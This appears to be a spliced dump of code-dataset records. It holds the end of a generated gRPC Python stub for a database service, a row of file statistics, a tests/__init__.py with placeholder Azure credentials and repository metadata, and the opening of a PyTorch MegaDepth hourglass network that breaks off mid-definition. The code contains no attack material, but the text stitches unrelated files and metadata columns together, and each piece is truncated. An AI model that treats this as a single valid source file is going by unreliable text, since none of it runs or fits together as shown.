response_serializer=net_dot_net__pb2.ret_temp_GC.SerializeToString,
),
'createdatabase': grpc.unary_unary_rpc_method_handler(
servicer.createdatabase,
request_deserializer=net_dot_net__pb2.para_dbname.FromString,
response_serializer=net_dot_net__pb2.dbres.SerializeToString,
),
'dropdatabase1': grpc.unary_unary_rpc_method_handler(
servicer.dropdatabase1,
request_deserializer=net_dot_net__pb2.para_dbname.FromString,
response_serializer=net_dot_net__pb2.dbres.SerializeToString,
),
'dropdatabase2': grpc.unary_unary_rpc_method_handler(
servicer.dropdatabase2,
request_deserializer=net_dot_net__pb2.para_dbname.FromString,
response_serializer=net_dot_net__pb2.dbres.SerializeToString,
),
'dropdatabase3': grpc.unary_unary_rpc_method_handler(
servicer.dropdatabase3,
request_deserializer=net_dot_net__pb2.para_dbname.FromString,
response_serializer=net_dot_net__pb2.usedbres.SerializeToString,
),
'usedatabase1': grpc.unary_unary_rpc_method_handler(
servicer.usedatabase1,
request_deserializer=net_dot_net__pb2.para_dbname.FromString,
response_serializer=net_dot_net__pb2.dbres.SerializeToString,
),
'usedatabase2': grpc.unary_unary_rpc_method_handler(
servicer.usedatabase2,
request_deserializer=net_dot_net__pb2.para_dbname.FromString,
response_serializer=net_dot_net__pb2.dbres.SerializeToString,
),
'usedatabase3': grpc.unary_unary_rpc_method_handler(
servicer.usedatabase3,
request_deserializer=net_dot_net__pb2.para_dbname.FromString,
response_serializer=net_dot_net__pb2.usedbres.SerializeToString,
),
'jr_exit': grpc.unary_unary_rpc_method_handler(
servicer.jr_exit,
request_deserializer=net_dot_net__pb2.para_jr_exit.FromString,
response_serializer=net_dot_net__pb2.ret_jr_exit.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'net.NetService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
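# Illustrative sketch (not part of the generated file): registering the
# example servicer above with a running server; the port is a placeholder.
def _example_serve():
    from concurrent import futures  # stdlib thread pool backing the server
    server = grpc.server(futures.ThreadPoolExecutor(max_workers=4))
    add_NetServiceServicer_to_server(_ExampleNetService(), server)
    server.add_insecure_port('[::]:50051')
    server.start()
    server.wait_for_termination()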
# This class is part of an EXPERIMENTAL API.
class NetService(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def Test(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/Test',
net_dot_net__pb2.Data.SerializeToString,
net_dot_net__pb2.Data1.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Createtable(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/Createtable',
net_dot_net__pb2.SQL.SerializeToString,
net_dot_net__pb2.Status.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Droptable(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/Droptable',
net_dot_net__pb2.SQL.SerializeToString,
net_dot_net__pb2.Status.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Loaddata(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/Loaddata',
net_dot_net__pb2.LoadParams.SerializeToString,
net_dot_net__pb2.Status.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Insertdata(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/Insertdata',
net_dot_net__pb2.LoadParams.SerializeToString,
net_dot_net__pb2.DataReturn.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Deletedata(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/Deletedata',
net_dot_net__pb2.SQL.SerializeToString,
net_dot_net__pb2.DataReturn.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SimpleSelect(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/SimpleSelect',
net_dot_net__pb2.SQL.SerializeToString,
net_dot_net__pb2.SimpleSelectReturn.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Excute(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/Excute',
net_dot_net__pb2.SQLTree.SerializeToString,
net_dot_net__pb2.TableData.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def jr_grpc_test(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/jr_grpc_test',
net_dot_net__pb2.para_jr_grpc_test.SerializeToString,
net_dot_net__pb2.ret_jr_grpc_test.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def grpc_dfs(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/grpc_dfs',
net_dot_net__pb2.para_grpc_dfs.SerializeToString,
net_dot_net__pb2.ret_grpc_dfs.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def start_jr(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/start_jr',
net_dot_net__pb2.para_start_jr.SerializeToString,
net_dot_net__pb2.ret_start_jr.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def temp_GC(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/temp_GC',
net_dot_net__pb2.para_temp_GC.SerializeToString,
net_dot_net__pb2.ret_temp_GC.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def createdatabase(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/createdatabase',
net_dot_net__pb2.para_dbname.SerializeToString,
net_dot_net__pb2.dbres.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def dropdatabase1(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/dropdatabase1',
net_dot_net__pb2.para_dbname.SerializeToString,
net_dot_net__pb2.dbres.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def dropdatabase2(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/dropdatabase2',
net_dot_net__pb2.para_dbname.SerializeToString,
net_dot_net__pb2.dbres.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def dropdatabase3(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/dropdatabase3',
net_dot_net__pb2.para_dbname.SerializeToString,
net_dot_net__pb2.usedbres.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def usedatabase1(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/usedatabase1',
net_dot_net__pb2.para_dbname.SerializeToString,
net_dot_net__pb2.dbres.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def usedatabase2(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/usedatabase2',
net_dot_net__pb2.para_dbname.SerializeToString,
net_dot_net__pb2.dbres.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def usedatabase3(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/usedatabase3',
net_dot_net__pb2.para_dbname.SerializeToString,
net_dot_net__pb2.usedbres.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def jr_exit(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/net.NetService/jr_exit',
net_dot_net__pb2.para_jr_exit.SerializeToString,
net_dot_net__pb2.ret_jr_exit.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
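# Illustrative sketch (not part of the generated file): the EXPERIMENTAL
# NetService class above issues one-off calls without an explicit channel;
# the target address below is a placeholder assumption.
#
#   reply = NetService.Test(net_dot_net__pb2.Data(),
#                           target='localhost:50051', insecure=True)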
| 43.939568 | 95 | 0.639728 | 2,953 | 30,538 | 6.265831 | 0.04233 | 0.039561 | 0.058855 | 0.078474 | 0.893261 | 0.862509 | 0.843052 | 0.783386 | 0.730044 | 0.702967 | 0 | 0.007634 | 0.283647 | 30,538 | 694 | 96 | 44.002882 | 0.838179 | 0.049283 | 0 | 0.645425 | 1 | 0 | 0.075378 | 0.034694 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068627 | false | 0 | 0.003268 | 0.03268 | 0.109477 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a4116c3b03efcc9ad286c3ea1aec0851e3a7d4c6 | 119 | py | Python | tests/__init__.py | RobertoPrevato/azure-storage-python | fae8ed9916095cc1fc17ada44e6406f96f7bd11d | [
"Apache-2.0"
] | 5 | 2018-03-21T12:59:53.000Z | 2020-11-30T12:24:18.000Z | tests/__init__.py | RobertoPrevato/azure-storage-python | fae8ed9916095cc1fc17ada44e6406f96f7bd11d | [
"Apache-2.0"
] | null | null | null | tests/__init__.py | RobertoPrevato/azure-storage-python | fae8ed9916095cc1fc17ada44e6406f96f7bd11d | [
"Apache-2.0"
] | 3 | 2018-10-09T18:35:19.000Z | 2019-03-13T09:43:02.000Z | __import__('pkg_resources').declare_namespace(__name__)
ACCOUNT_NAME = '<ACCOUNT_NAME>'
ACCOUNT_KEY = '<ACCOUNT_KEY>' | 29.75 | 56 | 0.789916 | 15 | 119 | 5.4 | 0.6 | 0.407407 | 0.37037 | 0.54321 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 119 | 4 | 57 | 29.75 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0.336134 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.333333 | null | null | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
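The tests/__init__.py record above couples a legacy setuptools namespace-package declaration with placeholder credentials; the <ACCOUNT_NAME> and <ACCOUNT_KEY> values are deliberately left unfilled and must be replaced before the integration tests can reach a real storage account. As an aside, on Python 3.3+ the same layout can rely on PEP 420 implicit namespace packages (no __init__.py at all), or on the portable pkgutil idiom, a minimal sketch of which is:

# pkgutil-style namespace package: a portable alternative to
# pkg_resources.declare_namespace for the same __init__.py
__path__ = __import__('pkgutil').extend_path(__path__, __name__)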
a43feedc239ab8b78089b8c5054d41f787f4e777 | 49,799 | py | Python | ove/algorithm/dain/networks/MegaDepth.py | iBobbyTS/OpenVideoEnhance | 64d12d7a4c344798e5d60eafd20f8f554f852e84 | [
"MIT"
] | 3 | 2020-12-20T14:15:19.000Z | 2021-03-23T12:23:38.000Z | ove/algorithm/dain/networks/MegaDepth.py | iBobbyTS/OpenVideoEnhance | 64d12d7a4c344798e5d60eafd20f8f554f852e84 | [
"MIT"
] | 1 | 2022-01-17T06:39:20.000Z | 2022-01-18T08:12:38.000Z | ove/algorithm/dain/networks/MegaDepth.py | iBobbyTS/OpenVideoEnhance | 64d12d7a4c344798e5d60eafd20f8f554f852e84 | [
"MIT"
] | 1 | 2021-03-03T22:53:05.000Z | 2021-03-03T22:53:05.000Z | import torch
import torch.nn as nn
from functools import reduce
from ove.utils.modeling import Sequential
class LambdaBase(Sequential):
def __init__(self, fn, *args):
super(LambdaBase, self).__init__(*args)
self.lambda_func = fn
def forward_prepare(self, input):
output = []
for module in self._modules.values():
output.append(module(input))
return output if output else input
class Lambda(LambdaBase):
def forward(self, input):
return self.lambda_func(self.forward_prepare(input))
class LambdaMap(LambdaBase):
def forward(self, input):
return list(map(self.lambda_func, self.forward_prepare(input)))
class LambdaReduce(LambdaBase):
def forward(self, input):
return reduce(self.lambda_func, self.forward_prepare(input))
def LA(x):
return x
def LB(x, y, dim=1):
return torch.cat((x, y), dim)
def LC(x, y):
return x + y
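# Illustrative note (not part of the original file): LambdaMap applies
# lambda_func to every submodule's output of the same input (Torch7's
# ConcatTable, with LA as identity), while LambdaReduce folds the outputs
# together -- LB concatenates along the channel axis (Concat) and LC adds
# them (CAddTable). A minimal sanity check, assuming a 2-channel input:
#
#   branch = LambdaReduce(LB, nn.Identity(), nn.Identity())
#   branch(torch.ones(1, 2, 4, 4)).shape  # -> torch.Size([1, 4, 4, 4])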
HourGlass = Sequential( # Sequential,
nn.Conv2d(3, 128, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(128),
nn.ReLU(inplace=True),
Sequential( # Sequential
LambdaMap(
LA, # ConcatTable
Sequential( # Sequential
nn.MaxPool2d((2, 2), (2, 2)),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
Sequential( # Sequential
LambdaMap(
LA, # ConcatTable
Sequential( # Sequential
nn.MaxPool2d((2, 2), (2, 2)),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
Sequential( # Sequential
LambdaMap(
LA, # ConcatTable
Sequential( # Sequential
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 64, (11, 11), (1, 1), (5, 5)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
),
Sequential( # Sequential
nn.AvgPool2d((2, 2), (2, 2)),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
Sequential( # Sequential
LambdaMap(
LA, # ConcatTable
Sequential( # Sequential
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
),
Sequential( # Sequential
nn.AvgPool2d((2, 2), (2, 2)),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
